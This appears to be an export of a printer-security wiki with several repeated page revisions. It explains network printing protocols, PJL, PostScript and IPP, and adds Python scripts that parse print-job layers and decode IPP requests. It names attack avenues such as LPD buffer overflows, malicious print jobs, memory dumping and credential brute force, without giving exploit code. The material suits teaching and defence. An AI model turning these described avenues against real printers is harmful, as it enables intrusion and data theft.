'''hardware''' is not addressed in detail in this wiki as from a security perspective it seems less relevant <ref>Even though some newspapers claimed hackers could set laser printers on fire by [http://www.wired.com/2011/12/hp-printer-lawsuit/ overheating] them.</ref>. This page aims to give an introduction to fundamental '''software''' printing technologies, including network printing protocols, printer control and page description languages. == High-level overview == Sending a document to a network printer may involve various protocols and languages. 
A schematic relationship regarding the encapsulation of printer languages is given below. [[File:Protocols.png|500px|Encapsulation of printer languages]] The network printing protocol acts as a channel to deploy print jobs which either contain the page description language directly or first invoke a printer/job control language to change settings like paper trays. From a security point of view this encapsulation is interesting, especially because functionality is overlapping. For example an – each time different – username can be set in [[IPP]], [[PJL]] and [[PostScript]]. If something is restricted in one layer, it may be allowed in the next one. While network printing protocols are discussed in this wiki, the focus is mainly on printer languages, particularly PJL and PostScript. → ''Related articles:'' [[Attack carriers]] == Network printing protocols == Sending data to a printer device can be done by [[USB_drive_or_cable|USB]]/parallel cable or over a network. This wiki focuses on network printing but most of the presented attacks can also be performed against local printers. There are various exotic protocols for network printing like Novell's [https://en.wikipedia.org/wiki/NetWare_Core_Protocol NCP] or [https://en.wikipedia.org/wiki/AppleTalk AppleTalk]. In the Windows world, [[SMB]]/CIFS printer shares have become quite popular. Furthermore, some devices support printing over generic protocols such as [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] file uploads. The most common printing protocols supported directly by network printers however are [[LPD]], [[IPP]], and [[Raw|raw port 9100]] printing. Network printing protocols can be attacked directly, for example by exploiting a [[Buffer overflows#LPD daemon|buffer overflow]] in the printer's LPD daemon. In many attack scenarios however, they only act as a '''carrier/channel''' to deploy malicious [[Printer language]] code. 
Note that a network printer usually supports multiple protocols to ‘print’ a document which broadens the attack surface. → ''Related articles:'' [[LPD]], [[IPP]], [[Raw]], [[SMB]] == Printer Control Languages == A job control language manages settings like output trays for the current print job. While it usually sits as an optional layer in-between the printing protocol and the page description language, functions may be overlapping. Examples of vendor-specific job control languages are [http://www.undocprint.org/formats/printer_control_languages/cpca CPCA], [http://www.undocprint.org/formats/printer_control_languages/xjcl XJCL], [http://www.undocprint.org/formats/printer_control_languages/ejl EJL] and [[PJL]] – which is supported by a variety of printers and will be discussed below. In addition, printer control and management languages are designed to affect not only a single print job but the device as a whole. One approach to define a common standard for this task was [http://www.undocprint.org/formats/printer_control_languages/npap NPAP]. However, it has not established itself and is only supported by Lexmark. Other printer manufacturers instead use [[SNMP]] or its PJL-based metalanguage [[PML]]. → ''Related articles:'' [[PJL]], [[PML]], [[SNMP]], [[UEL]] == Page Description Languages == A page description language (PDL) specifies the appearance of the actual document. It must however be pointed out that some PDLs offer limited job control, so a clear demarcation between page description and printer/job control language is not always possible. The function of a ‘printer driver’ is to translate the file to be printed into a PDL that is understood by the printer model. Note that some low cost inkjet printers do not support any high level page description language at all. 
So called host-based or [https://en.wikipedia.org/wiki/Graphics_Device_Interface#GDI_printers GDI] printers only accept simple bitmap datastreams like [http://www.undocprint.org/formats/page_description_languages/zjstream ZJS] while the actual rendering is done by the printer driver. There are various proprietary page description languages like Kyocera's [http://www.undocprint.org/formats/page_description_languages/prescribe PRESCRIBE], [http://www.undocprint.org/formats/page_description_languages/spl SPL], [http://www.undocprint.org/formats/page_description_languages/xes XES], [http://www.undocprint.org/formats/page_description_languages/capsl CaPSL], [http://www.undocprint.org/formats/page_description_languages/rpcs RPCS], [https://en.wikipedia.org/wiki/ESC/P ESC/P] which is mostly used in dot matrix printers or [https://en.wikipedia.org/wiki/HPGL HP-GL] and [https://en.wikipedia.org/wiki/HPGL#HP-GL.2F2 HP-GL/2] which have been designed for plotters. Support for direct [https://en.wikipedia.org/wiki/Portable_Document_Format PDF] and [https://en.wikipedia.org/wiki/Open_XML_Paper_Specification XPS] printing is also common on newer printers. The most common ‘standard’ page description languages however are [[PostScript]] and [[PCL]]. → ''Related articles:'' [[PCL]], [[PostScript]] ----------- 6c8f8879efe9d3e0ab144c88701ba0c8878e57f2 296 295 2017-01-31T07:43:29Z 84.153.135.37 0 /* Page Description Languages */ wikitext text/x-wiki Typical printers range from classical [https://en.wikipedia.org/wiki/Dot_matrix_printing dot matrix] to [https://en.wikipedia.org/wiki/Inkjet_printing inkjet] or [https://en.wikipedia.org/wiki/Laser_printing laser] printers used at home or in corporate environments. 
The printing '''hardware''' is not addressed in detail in this wiki as from a security perspective it seems less relevant <ref>Even though some newspapers claimed hackers could set laser printers on fire by [http://www.wired.com/2011/12/hp-printer-lawsuit/ overheating] them.</ref>. This page aims to give an introduction to fundamental '''software''' printing technologies, including network printing protocols, printer control and page description languages. == High-level overview == Sending a document to a network printer may involve various protocols and languages. A schematic relationship regarding the encapsulation of printer languages is given below. [[File:Protocols.png|500px|Encapsulation of printer languages]] The network printing protocol acts as a channel to deploy print jobs which either contain the page description language directly or first invoke a printer/job control language to change settings like paper trays. From a security point of view this encapsulation is interesting, especially because functionality is overlapping. For example an – each time different – username can be set in [[IPP]], [[PJL]] and [[PostScript]]. If something is restricted in one layer, it may be allowed in the next one. While network printing protocols are discussed in this wiki, the focus is mainly on printer languages, particularly PJL and PostScript. == Network printing protocols == Sending data to a printer device can be done by [[USB_drive_or_cable|USB]]/parallel cable or over a network. This wiki focuses on network printing but most of the presented attacks can also be performed against local printers. There are various exotic protocols for network printing like Novell's [https://en.wikipedia.org/wiki/NetWare_Core_Protocol NCP] or [https://en.wikipedia.org/wiki/AppleTalk AppleTalk]. In the Windows world, [[SMB]]/CIFS printer shares have become quite popular. 
Furthermore, some devices support printing over generic protocols such as [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] file uploads. The most common printing protocols supported directly by network printers however are [[LPD]], [[IPP]], and [[Raw|raw port 9100]] printing. Network printing protocols can be attacked directly, for example by exploiting a [[Buffer overflows#LPD daemon|buffer overflow]] in the printer's LPD daemon. In many attack scenarios however, they only act as a '''carrier/channel''' to deploy malicious [[Printer language]] code. Note that a network printer usually supports multiple protocols to ‘print’ a document which broadens the attack surface. → ''Related articles:'' [[LPD]], [[IPP]], [[Raw]], [[SMB]] == Printer Control Languages == A job control language manages settings like output trays for the current print job. While it usually sits as an optional layer in-between the printing protocol and the page description language, functions may be overlapping. Examples of vendor-specific job control languages are [http://www.undocprint.org/formats/printer_control_languages/cpca CPCA], [http://www.undocprint.org/formats/printer_control_languages/xjcl XJCL], [http://www.undocprint.org/formats/printer_control_languages/ejl EJL] and [[PJL]] – which is supported by a variety of printers and will be discussed below. In addition, printer control and management languages are designed to affect not only a single print job but the device as a whole. One approach to define a common standard for this task was [http://www.undocprint.org/formats/printer_control_languages/npap NPAP]. However, it has not established itself and is only supported by Lexmark. Other printer manufacturers instead use [[SNMP]] or its PJL-based metalanguage [[PML]]. 
→ ''Related articles:'' [[PJL]], [[PML]], [[SNMP]], [[UEL]] == Page Description Languages == A page description language (PDL) specifies the appearance of the actual document. It must however be pointed out that some PDLs offer limited job control, so a clear demarcation between page description and printer/job control language is not always possible. The function of a ‘printer driver’ is to translate the file to be printed into a PDL that is understood by the printer model. Note that some low cost inkjet printers do not support any high level page description language at all. So called host-based or [https://en.wikipedia.org/wiki/Graphics_Device_Interface#GDI_printers GDI] printers only accept simple bitmap datastreams like [http://www.undocprint.org/formats/page_description_languages/zjstream ZJS] while the actual rendering is done by the printer driver. There are various proprietary page description languages like Kyocera's [http://www.undocprint.org/formats/page_description_languages/prescribe PRESCRIBE], [http://www.undocprint.org/formats/page_description_languages/spl SPL], [http://www.undocprint.org/formats/page_description_languages/xes XES], [http://www.undocprint.org/formats/page_description_languages/capsl CaPSL], [http://www.undocprint.org/formats/page_description_languages/rpcs RPCS], [https://en.wikipedia.org/wiki/ESC/P ESC/P] which is mostly used in dot matrix printers or [https://en.wikipedia.org/wiki/HPGL HP-GL] and [https://en.wikipedia.org/wiki/HPGL#HP-GL.2F2 HP-GL/2] which have been designed for plotters. Support for direct [https://en.wikipedia.org/wiki/Portable_Document_Format PDF] and [https://en.wikipedia.org/wiki/Open_XML_Paper_Specification XPS] printing is also common on newer printers. The most common ‘standard’ page description languages however are [[PostScript]] and [[PCL]]. 
→ ''Related articles:'' [[PCL]], [[PostScript]] ----------- 05d5d2fbdcb011484a5c3f3bf94ad663be8e9a69 295 294 2017-01-31T07:43:20Z 84.153.135.37 0 /* Printer Control Languages */ wikitext text/x-wiki Typical printers range from classical [https://en.wikipedia.org/wiki/Dot_matrix_printing dot matrix] to [https://en.wikipedia.org/wiki/Inkjet_printing inkjet] or [https://en.wikipedia.org/wiki/Laser_printing laser] printers used at home or in corporate environments. The printing '''hardware''' is not addressed in detail in this wiki as from a security perspective it seems less relevant <ref>Even though some newspapers claimed hackers could set laser printers on fire by [http://www.wired.com/2011/12/hp-printer-lawsuit/ overheating] them.</ref>. This page aims to give an introduction to fundamental '''software''' printing technologies, including network printing protocols, printer control and page description languages. == High-level overview == Sending a document to a network printer may involve various protocols and languages. A schematic relationship regarding the encapsulation of printer languages is given below. [[File:Protocols.png|500px|Encapsulation of printer languages]] The network printing protocol acts as a channel to deploy print jobs which either contain the page description language directly or first invoke a printer/job control language to change settings like paper trays. From a security point of view this encapsulation is interesting, especially because functionality is overlapping. For example an – each time different – username can be set in [[IPP]], [[PJL]] and [[PostScript]]. If something is restricted in one layer, it may be allowed in the next one. While network printing protocols are discussed in this wiki, the focus is mainly on printer languages, particularly PJL and PostScript. == Network printing protocols == Sending data to a printer device can be done by [[USB_drive_or_cable|USB]]/parallel cable or over a network. 
This wiki focuses on network printing but most of the presented attacks can also be performed against local printers. There are various exotic protocols for network printing like Novell's [https://en.wikipedia.org/wiki/NetWare_Core_Protocol NCP] or [https://en.wikipedia.org/wiki/AppleTalk AppleTalk]. In the Windows world, [[SMB]]/CIFS printer shares have become quite popular. Furthermore, some devices support printing over generic protocols such as [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] file uploads. The most common printing protocols supported directly by network printers however are [[LPD]], [[IPP]], and [[Raw|raw port 9100]] printing. Network printing protocols can be attacked directly, for example by exploiting a [[Buffer overflows#LPD daemon|buffer overflow]] in the printer's LPD daemon. In many attack scenarios however, they only act as a '''carrier/channel''' to deploy malicious [[Printer language]] code. Note that a network printer usually supports multiple protocols to ‘print’ a document which broadens the attack surface. → ''Related articles:'' [[LPD]], [[IPP]], [[Raw]], [[SMB]] == Printer Control Languages == A job control language manages settings like output trays for the current print job. While it usually sits as an optional layer in-between the printing protocol and the page description language, functions may be overlapping. Examples of vendor-specific job control languages are [http://www.undocprint.org/formats/printer_control_languages/cpca CPCA], [http://www.undocprint.org/formats/printer_control_languages/xjcl XJCL], [http://www.undocprint.org/formats/printer_control_languages/ejl EJL] and [[PJL]] – which is supported by a variety of printers and will be discussed below. In addition, printer control and management languages are designed to affect not only a single print job but the device as a whole. 
One approach to define a common standard for this task was [http://www.undocprint.org/formats/printer_control_languages/npap NPAP]. However, it has not established itself and is only supported by Lexmark. Other printer manufacturers instead use [[SNMP]] or its PJL-based metalanguage [[PML]]. → ''Related articles:'' [[PJL]], [[PML]], [[SNMP]], [[UEL]] == Page Description Languages == A page description language (PDL) specifies the appearance of the actual document. It must however be pointed out that some PDLs offer limited job control, so a clear demarcation between page description and printer/job control language is not always possible. The function of a ‘printer driver’ is to translate the file to be printed into a PDL that is understood by the printer model. Note that some low cost inkjet printers do not support any high level page description language at all. So called host-based or [https://en.wikipedia.org/wiki/Graphics_Device_Interface#GDI_printers GDI] printers only accept simple bitmap datastreams like [http://www.undocprint.org/formats/page_description_languages/zjstream ZJS] while the actual rendering is done by the printer driver. There are various proprietary page description languages like Kyocera's [http://www.undocprint.org/formats/page_description_languages/prescribe PRESCRIBE], [http://www.undocprint.org/formats/page_description_languages/spl SPL], [http://www.undocprint.org/formats/page_description_languages/xes XES], [http://www.undocprint.org/formats/page_description_languages/capsl CaPSL], [http://www.undocprint.org/formats/page_description_languages/rpcs RPCS], [https://en.wikipedia.org/wiki/ESC/P ESC/P] which is mostly used in dot matrix printers or [https://en.wikipedia.org/wiki/HPGL HP-GL] and [https://en.wikipedia.org/wiki/HPGL#HP-GL.2F2 HP-GL/2] which have been designed for plotters. 
Support for direct [https://en.wikipedia.org/wiki/Portable_Document_Format PDF] and [https://en.wikipedia.org/wiki/Open_XML_Paper_Specification XPS] printing is also common on newer printers. The most common ‘standard’ page description languages however are [[PostScript]] and [[PCL]]. → ''Related aricles:'' [[PCL]], [[PostScript]] ----------- d4a6c331c842c29cc708b056ca2bc80c8340dd10 294 272 2017-01-31T07:43:07Z 84.153.135.37 0 /* Network printing protocols */ wikitext text/x-wiki Typical printers range from classical [https://en.wikipedia.org/wiki/Dot_matrix_printing dot matrix] to [https://en.wikipedia.org/wiki/Inkjet_printing inkjet] or [https://en.wikipedia.org/wiki/Laser_printing laser] printers used at home or in corporate environments. The printing '''hardware''' is not addressed in detail in this wiki as from a security perspective it seems less relevant <ref>Even though some newspapers claimed hackers could set laser printers on fire by [http://www.wired.com/2011/12/hp-printer-lawsuit/ overheating] them.</ref>. This page aims to give an introduction to fundamental '''software''' printing technologies, including network printing protocols, printer control and page description languages. == High-level overview == Sending a document to a network printer may involve various protocols and languages. A schematic relationship regarding the encapsulation of printer languages is given below. [[File:Protocols.png|500px|Encapsulation of printer languages]] The network printing protocol acts as a channel to deploy print jobs which either contain the page description language directly or first invoke a printer/job control language to change settings like paper trays. From a security point of view this encapsulation is interesting, especially because functionality is overlapping. For example an – each time different – username can be set in [[IPP]], [[PJL]] and [[PostScript]]. If something is restricted in one layer, it may be allowed in the next one. 
While network printing protocols are discussed in this wiki, the focus is mainly on printer languages, particularly PJL and PostScript.

== Network printing protocols ==

Sending data to a printer device can be done by [[USB_drive_or_cable|USB]]/parallel cable or over a network. This wiki focuses on network printing, but most of the presented attacks can also be performed against local printers. There are various exotic protocols for network printing like Novell's [https://en.wikipedia.org/wiki/NetWare_Core_Protocol NCP] or [https://en.wikipedia.org/wiki/AppleTalk AppleTalk]. In the Windows world, [[SMB]]/CIFS printer shares have become quite popular. Furthermore, some devices support printing over generic protocols such as [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] file uploads. The most common printing protocols supported directly by network printers, however, are [[LPD]], [[IPP]], and [[Raw|raw port 9100]] printing.

Network printing protocols can be attacked directly, for example by exploiting a [[Buffer overflows#LPD daemon|buffer overflow]] in the printer's LPD daemon. In many attack scenarios, however, they only act as a '''carrier/channel''' to deploy malicious [[Printer language]] code. Note that a network printer usually supports multiple protocols to ‘print’ a document, which broadens the attack surface.

→ ''Related articles:'' [[LPD]], [[IPP]], [[Raw]], [[SMB]]

== Printer Control Languages ==

A job control language manages settings like output trays for the current print job. While it usually sits as an optional layer between the printing protocol and the page description language, functions may overlap. Examples of vendor-specific job control languages are [http://www.undocprint.org/formats/printer_control_languages/cpca CPCA], [http://www.undocprint.org/formats/printer_control_languages/xjcl XJCL], [http://www.undocprint.org/formats/printer_control_languages/ejl EJL] and [[PJL]], which is supported by a variety of printers and will be discussed below. In addition, printer control and management languages are designed to affect not only a single print job but the device as a whole. One approach to define a common standard for this task was [http://www.undocprint.org/formats/printer_control_languages/npap NPAP]. However, it has not established itself and is only supported by Lexmark. Other printer manufacturers instead use [[SNMP]] or its PJL-based metalanguage [[PML]].

→ ''Related articles:'' [[PJL]], [[PML]], [[SNMP]], [[UEL]]

== Page Description Languages ==

A page description language (PDL) specifies the appearance of the actual document. It must, however, be pointed out that some PDLs offer limited job control, so a clear demarcation between page description and printer/job control language is not always possible. The function of a ‘printer driver’ is to translate the file to be printed into a PDL that is understood by the printer model. Note that some low-cost inkjet printers do not support any high-level page description language at all. So-called host-based or [https://en.wikipedia.org/wiki/Graphics_Device_Interface#GDI_printers GDI] printers only accept simple bitmap data streams like [http://www.undocprint.org/formats/page_description_languages/zjstream ZJS], while the actual rendering is done by the printer driver. There are various proprietary page description languages like Kyocera's [http://www.undocprint.org/formats/page_description_languages/prescribe PRESCRIBE], [http://www.undocprint.org/formats/page_description_languages/spl SPL], [http://www.undocprint.org/formats/page_description_languages/xes XES], [http://www.undocprint.org/formats/page_description_languages/capsl CaPSL], [http://www.undocprint.org/formats/page_description_languages/rpcs RPCS], [https://en.wikipedia.org/wiki/ESC/P ESC/P], which is mostly used in dot matrix printers, or [https://en.wikipedia.org/wiki/HPGL HP-GL] and [https://en.wikipedia.org/wiki/HPGL#HP-GL.2F2 HP-GL/2], which have been designed for plotters. Support for direct [https://en.wikipedia.org/wiki/Portable_Document_Format PDF] and [https://en.wikipedia.org/wiki/Open_XML_Paper_Specification XPS] printing is also common on newer printers. The most common ‘standard’ page description languages, however, are [[PostScript]] and [[PCL]].

→ ''Related articles:'' [[PCL]], [[PostScript]]

-----------
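The layering just described (printing protocol as channel, an optional job control language such as PJL in front, the page description language behind) is what a print server filter or a monitoring sensor sees when it looks at a raw job. The following Python script is an added example and not code from this wiki or from any printer vendor: it splits a captured job into the UEL escape, the PJL command lines and the PDL body, records which PDL the PJL header announces and which one the data actually matches, and flags a disagreement between the two. The signature table covers only PostScript, PCL and PDF, and all sample jobs at the bottom are constructed.

```python
"""Recognise the language layers of a raw print job.

Added example for this wiki page (not code from the wiki or from any
printer vendor). It assumes the conventional layering described above:
an optional UEL escape and PJL header in front of the page description
language (PDL). All sample jobs at the bottom are constructed.
"""
import re

UEL = b"\x1b%-12345X"  # Universal Exit Language: resets the interpreter and enters PJL

# Signatures of the page description languages discussed on this page
PDL_SIGNATURES = [
    ("PostScript", re.compile(rb"^%!PS")),
    ("PDF", re.compile(rb"^%PDF-")),
    ("PCL", re.compile(rb"^\x1b[E*&(]")),  # ESC E (reset) or another PCL escape sequence
]
# Name a job announces via PJL ENTER LANGUAGE -> name used in the signature table
PJL_LANGUAGE_NAMES = {"POSTSCRIPT": "PostScript", "PCL": "PCL", "PDF": "PDF"}

PJL_COMMAND = re.compile(rb"@PJL\s+([A-Z]+)", re.IGNORECASE)
PJL_ENTER = re.compile(rb"@PJL\s+ENTER\s+LANGUAGE\s*=\s*(\w+)", re.IGNORECASE)


def analyse_job(job: bytes) -> dict:
    """Return which layers a job passes through: UEL, PJL commands, declared and detected PDL."""
    report = {
        "uel": job.startswith(UEL),
        "pjl_commands": [],
        "pjl_enter_language": None,
        "pdl": None,
        "language_mismatch": False,
    }
    body = job[len(UEL):] if report["uel"] else job

    # PJL layer: one "@PJL ..." command per line, terminated by ENTER LANGUAGE
    while body.lstrip(b"\r\n").startswith(b"@PJL"):
        line, _, body = body.lstrip(b"\r\n").partition(b"\n")
        cmd = PJL_COMMAND.match(line)
        if cmd:
            report["pjl_commands"].append(cmd.group(1).decode("ascii").upper())
        enter = PJL_ENTER.match(line)
        if enter:
            report["pjl_enter_language"] = enter.group(1).decode("ascii").upper()
            break  # everything after this line belongs to the PDL interpreter

    # PDL layer: what the data behind the PJL header actually looks like
    for name, signature in PDL_SIGNATURES:
        if signature.match(body):
            report["pdl"] = name
            break

    # Consistency check: a job that announces one language but carries another
    declared = PJL_LANGUAGE_NAMES.get(report["pjl_enter_language"])
    if declared and report["pdl"] and declared != report["pdl"]:
        report["language_mismatch"] = True
    return report


# Constructed sample jobs
JOB_PS_VIA_PJL = (
    UEL
    + b'@PJL JOB NAME="report"\r\n'
    + b"@PJL SET COPIES=2\r\n"
    + b"@PJL ENTER LANGUAGE = POSTSCRIPT\r\n"
    + b"%!PS-Adobe-3.0\n/Helvetica findfont 12 scalefont setfont\n"
    + b"72 720 moveto (hello) show\nshowpage\n"
    + UEL
)
JOB_PLAIN_PS = b"%!PS-Adobe-3.0\nshowpage\n"          # PDL sent directly, no PJL header
JOB_PCL = b"\x1bE\x1b&l0Ohello\x1bE"                   # PCL reset, orientation, text, reset
JOB_MISLABELLED = UEL + b"@PJL ENTER LANGUAGE = PCL\r\n%!PS-Adobe-3.0\nshowpage\n"

if __name__ == "__main__":
    for label, job in [("ps-via-pjl", JOB_PS_VIA_PJL), ("plain-ps", JOB_PLAIN_PS),
                       ("pcl", JOB_PCL), ("mislabelled", JOB_MISLABELLED)]:
        print(label, analyse_job(job))
```

The report for the first sample shows all three layers in one job (UEL, three PJL commands, PostScript body); the plain PostScript sample shows that the PJL layer is optional, which is why restricting PJL alone does not restrict what reaches the PDL interpreter. The mismatch flag is the kind of check a print server can log before handing a job to the device, since printers that auto-sense the language will happily run the PostScript body of a job labelled PCL.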
IPP 0 26 311 263 2017-01-31T08:27:31Z 84.153.135.37 0 wikitext text/x-wiki

[[File:IPP-deployment-channel.png|thumb|180px|Printing over IPP]]

Between 1999 and 2005 the IETF IPP working group published various draft standards for an LPD successor capable of authentication and print job queue management. The Internet Printing Protocol (IPP) is defined in RFC2910 <ref>''[https://www.ietf.org/rfc/rfc2910.txt RFC2910: Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> and RFC2911 <ref>''[https://www.ietf.org/rfc/rfc2911.txt RFC2911: Internet Printing Protocol/1.1: Model and Semantics]'', T. Hastings and others, 2000</ref>. IPP is an extensible protocol: for example, ‘IPP Everywhere’ as specified in <ref>''[http://www.pwg.org/candidates/cs-ippeve10-20130128-5100.14.pdf IPP Everywhere]'', PWG, The Printer Working Group, 2013</ref> is a candidate standard for mobile and cloud printing, and IPP extensions for 3D printing <ref>''[http://ftp.pwg.org/pub/pwg/ipp/wd/wd-ipp3d10-20160824.pdf IPP 3D Printing Extensions (3D)]'', PWG, The Printer Working Group, 2016</ref> have been released. Because IPP is based on HTTP, it inherits all existing security features like [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication and [https://en.wikipedia.org/wiki/Transport_Layer_Security SSL/TLS] encryption. To submit a print job or to retrieve status information from the printer, an HTTP ''POST'' request is sent to the IPP server listening on port 631/tcp. A well-known open-source IPP implementation is ''CUPS'' <ref>''[http://www.cups.org/ Common Unix Printing System]'', M. Sweet</ref>, which is the default printing system in many Linux distributions and OS X. Network printers usually run their own IPP server as one method to accept print jobs.

Similar to [[LPD]], IPP is a '''channel''' to deploy the actual data to be printed and can be abused as a carrier for malicious PostScript or PJL files. In this wiki, IPP itself is not exploited further except for [[Accounting bypass|accounting bypasses]].

→ ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Accounting bypass]], [[Buffer overflows]] <!-- , printer language discovery and cross-site printing attacks. -->

----
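To make the wire format behind "an HTTP POST to port 631/tcp" concrete, here is an added example, not code from this wiki or from CUPS, that encodes an IPP/1.1 Print-Job request as laid out in RFC 2910 (the RFC cited above), wraps it in the HTTP POST, and decodes it again the way a print server or a network sensor would. Tag and operation-id values are the ones from RFC 2910/2911; the printer URI, host name, queue path, user name, job name and document are constructed sample values. The decoder is also where the accounting question becomes visible: the requesting-user-name attribute is whatever the client wrote into the request, so the helper at the end only trusts it when the HTTP layer has authenticated the sender.

```python
"""Minimal IPP/1.1 (RFC 2910) Print-Job encoder and decoder.

Added example for this wiki page; it is not code from the wiki or from
CUPS. Tag and operation values follow RFC 2910/2911; the printer URI,
host, user name, job name and document used below are constructed.
"""
import struct

# Delimiter tags (RFC 2910, section 3.5.1) and value tags (section 3.5.2)
OPERATION_ATTRIBUTES_TAG = 0x01
END_OF_ATTRIBUTES_TAG = 0x03
TAG_INTEGER, TAG_BOOLEAN, TAG_ENUM = 0x21, 0x22, 0x23
TAG_NAME = 0x42           # nameWithoutLanguage
TAG_URI = 0x45
TAG_CHARSET = 0x47
TAG_NATURAL_LANGUAGE = 0x48
TAG_MIME_MEDIA_TYPE = 0x49
OP_PRINT_JOB = 0x0002     # operation-id of Print-Job (RFC 2911)


def _attribute(tag, name, value):
    """Encode one attribute: value-tag, name-length, name, value-length, value."""
    raw = struct.pack(">i", value) if isinstance(value, int) else value.encode("utf-8")
    name_bytes = name.encode("ascii")
    return (struct.pack(">BH", tag, len(name_bytes)) + name_bytes
            + struct.pack(">H", len(raw)) + raw)


def encode_print_job(printer_uri, user, job_name, document,
                     request_id=1, document_format="application/postscript"):
    """Build an IPP Print-Job request: header, operation attributes, then the document."""
    header = struct.pack(">BBHI", 1, 1, OP_PRINT_JOB, request_id)  # version 1.1
    attrs = bytes([OPERATION_ATTRIBUTES_TAG])
    attrs += _attribute(TAG_CHARSET, "attributes-charset", "utf-8")
    attrs += _attribute(TAG_NATURAL_LANGUAGE, "attributes-natural-language", "en")
    attrs += _attribute(TAG_URI, "printer-uri", printer_uri)
    attrs += _attribute(TAG_NAME, "requesting-user-name", user)  # chosen by the client
    attrs += _attribute(TAG_NAME, "job-name", job_name)
    attrs += _attribute(TAG_MIME_MEDIA_TYPE, "document-format", document_format)
    attrs += bytes([END_OF_ATTRIBUTES_TAG])
    return header + attrs + document


def wrap_http_post(path, ipp_body, host):
    """IPP messages travel as the body of an HTTP POST with Content-Type application/ipp."""
    head = (f"POST {path} HTTP/1.1\r\nHost: {host}\r\n"
            f"Content-Type: application/ipp\r\nContent-Length: {len(ipp_body)}\r\n\r\n")
    return head.encode("ascii") + ipp_body


def decode_request(data):
    """Parse an IPP request into (operation-id, request-id, {attribute: [values]}, document)."""
    _major, _minor, op, req_id = struct.unpack(">BBHI", data[:8])
    pos, attrs, last_name = 8, {}, None
    while pos < len(data):
        tag = data[pos]
        pos += 1
        if tag == END_OF_ATTRIBUTES_TAG:
            break
        if tag < 0x10:  # another delimiter tag opens the next attribute group
            continue
        name_len = struct.unpack(">H", data[pos:pos + 2])[0]
        name = data[pos + 2:pos + 2 + name_len].decode("ascii") or last_name  # "" = extra value
        pos += 2 + name_len
        value_len = struct.unpack(">H", data[pos:pos + 2])[0]
        raw = data[pos + 2:pos + 2 + value_len]
        pos += 2 + value_len
        if tag in (TAG_INTEGER, TAG_ENUM):
            value = struct.unpack(">i", raw)[0]
        elif tag == TAG_BOOLEAN:
            value = bool(raw[0])
        else:
            value = raw.decode("utf-8")
        attrs.setdefault(name, []).append(value)
        last_name = name
    return op, req_id, attrs, data[pos:]


def accounted_user(attrs, authenticated_user=None):
    """Name a print server should charge the job to.

    requesting-user-name is supplied by the client, so it is only meaningful
    when the HTTP layer (basic/digest/Kerberos) has authenticated the sender;
    then the authenticated identity wins. The "anonymous" fallback is a
    placeholder choice for this example.
    """
    if authenticated_user:
        return authenticated_user
    return attrs.get("requesting-user-name", ["anonymous"])[0]


if __name__ == "__main__":
    req = encode_print_job("ipp://printer.example/printers/lab", "alice", "report",
                           b"%!PS-Adobe-3.0\nshowpage\n", request_id=7)
    print(wrap_http_post("/printers/lab", req, "printer.example")[:120])
    print(decode_request(req)[:3])
```

Running the script prints the HTTP framing followed by the decoded attributes, with "alice" appearing exactly as the client wrote it. The same decoder can be pointed at captured port 631 traffic to compare the user name a job claims with the identity the server actually authenticated, which is the log field an accounting system should be keyed on.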
Similar to [[LPD]], IPP is a '''channel''' to deploy the actual data to be printed and can be abused as a carrier for malicious PostScript or PJL files. In this wiki, IPP itself is no further exploited except for [[Accounting bypass|accounting bypasses]]. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Accounting bypass]], [[Buffer overflows]] <!-- , printer language discovery and cross-site printing attacks. --> ---- 99b5c66c76bf9553c7281aa47650b5a5917e28c1 257 250 2017-01-28T14:42:56Z Admin 1 wikitext text/x-wiki [[File:IPP-deployment-channel.png|thumb|180px|IPP print job deployment]] Between 1999 and 2005 the IETF IPP working group published various draft standards for an LPD successor capable of authentication and print job queue management. The Internet Printing Protocol (IPP) is defined in RFC2910 <ref>''[https://www.ietf.org/rfc/rfc2910.txt RFC2910: Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> and RFC2911 <ref>''[https://www.ietf.org/rfc/rfc2911.txt RFC2911: Internet Printing Protocol/1.1: Model and Semantics]'', T. Hastings and others, 2000</ref>. IPP is an extendable protocol, for example ‘IPP Everywhere’ as specified in <ref>''[http://www.pwg.org/candidates/cs-ippeve10-20130128-5100.14.pdf IPP Everywhere]'', PWG, The Printer Working Group, 2013</ref> is a candidate for a standard in mobile and cloud printing and IPP extensions for 3D printing <ref>''[http://ftp.pwg.org/pub/pwg/ipp/wd/wd-ipp3d10-20160824.pdf IPP 3D Printing Extensions (3D)]'', PWG, The Printer Working Group, 2016</ref> have been released. Because IPP is based on HTTP, it inherits all existing security features like [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication and [https://en.wikipedia.org/wiki/Transport_Layer_Security SSL/TLS] encryption. 
Information disclosure 0 38 159 158 2017-01-15T17:17:24Z 92.227.58.56 0 wikitext text/x-wiki
Apart from print jobs, printers may contain further potentially sensitive information like passwords – not only for the device itself but sometimes even for the surrounding network environment.

''Currently, the following information disclosure categories are discussed in this wiki:''
* [[Memory access]] – Dumping the printer's NVRAM using proprietary PJL commands
* [[File system access]] – Performing file system operations using PostScript and PJL
* [[Credential disclosure]] – Obtaining PJL and PostScript passwords by brute-force attacks
2ecea7e901e3e9e76b1bbf29f9a5f2a0067ee0f6
LPD 0 25 314 313 2017-01-31T08:32:36Z 84.153.135.37 0 wikitext text/x-wiki
[[File:LPD-deployment-channel.png|thumb|180px|Printing over LPD]]
